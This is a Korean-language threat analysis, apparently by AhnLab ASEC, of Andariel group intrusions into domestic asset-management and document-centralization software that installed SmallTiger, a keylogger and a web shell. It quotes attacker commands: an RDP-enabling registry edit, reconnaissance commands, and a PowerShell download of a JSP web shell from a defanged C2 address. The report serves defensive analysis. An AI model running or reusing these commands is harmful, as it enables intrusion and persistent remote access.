Andariel 그룹의 국내 솔루션 대상 공격 사례 분석 (SmallTiger)
Andariel 그룹은 과거부터 국내 기업들에서 사용하는 다양한 소프트웨어들을 공격해 왔다. [1] 대표적으로 자산 관리 솔루션, 정보 유출 방지 (DLP) 솔루션 등이 있으며 이외에도 다양한 솔루션들에 대한 취약점 공격 사례도 확인된다.
2024년 하반기에도 Andariel 그룹의 공격 사례는 지속되고 있으며 주로 SmallTiger를 설치하고 있다. [2] 악용 대상 소프트웨어로는 수년 전부터 악용 중인 국내 자산 관리 솔루션이 대표적이며 이외에도 문서 중앙화 솔루션에 대한 악용 사례 정황도 확인된다.
1. 국내 자산 관리 솔루션 대상 공격 사례
해당 솔루션은 지속적으로 공격에 악용되고 있으며 자산 관리 솔루션이라는 특성상 제어 서버가 탈취당한 후 공격자가 이를 악용해 악성코드 설치 명령을 실행하는 방식인 것으로 추정된다. 이러한 공격 사례에서는 주로 ModeLoader가 설치되었다.
이외에도 외부에 노출된 업데이트 서버를 대상으로 무차별 대입 공격 및 사전 공격을 통해 제어를 탈취하는 사례도 확인되었다. 해당 사례에서 공격자는 업데이트 프로그램을 SmallTiger로 교체하였으며 이러한 과정을 통해 조직 내의 시스템들에 SmallTiger를 배포하려고 시도하였다.
이번에 확인된 사례는 최초 침투 방식이나 구체적인 유표 방식은 확인되지 않지만 해당 자산 관리 솔루션의 설치 경로에 SmallTiger가 설치되었으며 KeyLogger가 함께 사용되었다. KeyLogger는 동일 경로의 “MsMpLog.tmp” 파일에 사용자의 키 입력을 저장하는 것이 특징이다.
Figure 1. 키로깅 데이터
공격자는 SmallTiger를 이용해 추후 감염 시스템에 RDP로 접근할 수 있도록 설정하였다. RDP를 활성화하는데 사용되는 다음 명령은 SmallTiger를 통해 실행되었으며 이외에도 백도어 계정을 추가하고 은폐하기 위한 목적으로 CreateHiddenAccount라는 오픈 소스 도구를 설치하기도 하였다.
| > reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f |
Figure 2. SmallTiger를 통해 실행된 RDP 활성화 명령
2. 국내 문서 중앙화 솔루션 대상 공격 사례
최근에는 국내 문서 중앙화 솔루션을 대상으로 한 공격 정황이 확인되고 있다. 해당 솔루션에서 사용하는 Apache Tomcat 웹 서버들은 모두 오래된 버전이며 공격자는 최신 업데이트가 진행되지 않은 곳을 대상으로 하는 것으로 추정된다. 공격자는 최초 침투 이후 시스템의 기본적인 정보들을 조회하였으며 Advanced Port Scanner가 설치된 이력도 존재한다.
| > ping 20.20.100.32 > tasklist > ipconfig /all > netstat -noa > whoami |
이후에는 다음과 같은 파워쉘 명령으로 웹쉘을 설치하는 것으로 추정된다. 현재 다운로드는 불가하지만 다운로드 서버인 “45.61.148[.]153”은 위 공격 사례에서 확인된 SmallTiger의 C&C 서버 주소이기도 하다.
| powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘hxxp://45.61.148[.]153/pizza.jsp’,’C:\*********\web\*********\threadstate.jsp’) |
3. 결론
ASEC에서는 최근 SmallTiger를 이용한 Andariel 그룹의 공격 사례들이 다시 시작되고 있는 것을 확인하였다. 공격자는 과거부터 국내의 다양한 솔루션들을 악용하거나 취약점을 공격하여 악성코드를 설치하고 있다. 이번에 확인된 공격 사례는 과거부터 지속적으로 악용되고 있던 자산 관리 솔루션과 새롭게 확인된 국내 문서 중앙화 솔루션에 대한 공격 정황이다.
기업 보안 담당자는 자산 관리 솔루션이나 문서 중앙화 솔루션 같은 중앙 집중형 관리 솔루션들의 모니터링을 강화하고 프로그램 보안 취약점이 있다면 패치를 수행하여야 한다. 그리고 OS 및 인터넷 브라우저 등의 프로그램들에 대한 최신 패치 및 V3를 최신 버전으로 업데이트하여 이러한 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.
AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여 확인해보세요.
